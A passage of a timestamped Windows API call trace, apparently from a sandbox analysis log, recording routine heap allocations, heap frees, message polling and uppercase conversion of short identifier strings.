[0256.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0256.554] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0256.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0256.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0256.555] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0256.555] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0256.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17f8 [0256.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0256.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0256.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0256.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.556] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0256.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0256.557] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0256.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.557] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.557] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.558] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.559] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0256.559] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.559] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0256.559] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0256.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0256.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.559] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0256.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.560] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0256.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0256.560] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.560] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.562] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.562] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0256.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0256.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0256.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0256.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0256.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0256.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.563] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0256.563] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0256.564] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0256.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0256.564] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0256.564] HeapFree (in: 